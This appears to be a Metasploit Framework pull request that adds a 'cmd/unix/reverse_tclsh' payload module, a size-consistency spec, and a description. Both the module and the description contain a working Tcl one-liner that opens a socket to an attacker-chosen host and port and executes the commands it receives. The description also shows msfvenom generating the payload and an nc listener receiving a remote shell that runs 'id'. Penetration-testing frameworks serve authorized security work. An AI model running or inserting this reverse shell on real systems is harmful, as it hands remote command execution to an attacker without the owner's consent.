### PR TITLE
Add cmd/unix/reverse_tclsh

### DIFF
--- a/modules/payloads/singles/cmd/unix/reverse_tclsh.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_tclsh.rb
@@ -1,0 +1,50 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module MetasploitModule
+
+  CachedSize = 185
+
+  include Msf::Payload::Single
+  include Msf::Sessions::CommandShellOptions
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'          => 'Unix Command Shell, Reverse TCP (via Tclsh)',
+      'Description'   => 'Creates an interactive shell via Tclsh',
+      'Author'        => ['bcoles'],
+      'License'       => MSF_LICENSE,
+      'Platform'      => 'unix',
+      'Arch'          => ARCH_CMD,
+      'Handler'       => Msf::Handler::ReverseTcp,
+      'Session'       => Msf::Sessions::CommandShell,
+      'PayloadType'   => 'cmd',
+      'RequiredCmd'   => 'tclsh',
+      'Payload'       =>
+        {
+          'Offsets' => { },
+          'Payload' => ''
+        }
+      ))
+  end
+
+  #
+  # Constructs the payload
+  #
+  def generate
+    super + command_string
+  end
+
+  #
+  # Returns the command string to use for execution
+  #
+  def command_string
+    %Q{echo 'set s [socket #{datastore['LHOST']} #{datastore['LPORT']}];set c "";while {$c != "exit"} {flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} {puts $s $r};flush $s;};close $s;'|tclsh}
+  end
+end

--- a/modules/payloads/singles/cmd/unix/reverse_tclsh.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_tclsh.rb
@@ -9,7 +9,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module MetasploitModule
 
-  CachedSize = 185
+  CachedSize = 184
 
   include Msf::Payload::Single
   include Msf::Sessions::CommandShellOptions

--- a/spec/modules/payloads_spec.rb
+++ b/spec/modules/payloads_spec.rb
@@ -1008,6 +1008,16 @@ RSpec.describe 'modules/payloads', :content do
                           reference_name: 'cmd/unix/reverse_stub'
   end
 
+  context 'cmd/unix/reverse_tclsh' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                              'singles/cmd/unix/reverse_tclsh'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'cmd/unix/reverse_tclsh'
+  end
+
   context 'cmd/unix/reverse_zsh' do
     it_should_behave_like 'payload cached size is consistent',
                           ancestor_reference_names: [


### PR DESCRIPTION
```
$ ruby -W0 ./msfvenom -p cmd/unix/reverse_tclsh LPORT=1337 LHOST=172.16.191.165 
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 183 bytes
echo 'set s [socket 172.16.191.165 1337];set c "";while {$c != "exit"} {flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} {puts $s $r};flush $s;};close $s;'|tclsh
$ nc -lvp 1337
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1337
Ncat: Listening on 0.0.0.0:1337
Ncat: Connection from 172.16.191.228.
Ncat: Connection from 172.16.191.228:39365.
id
uid=1001(test) gid=1001(test) groups=1001(test)
exit
$
```

I have no idea what best practice for attribution is here. There are dozens of reverse shell cheatsheets going back over a decade. On the other hand, while I copied (and modified) the one-liner shell, it's not particularly complex.
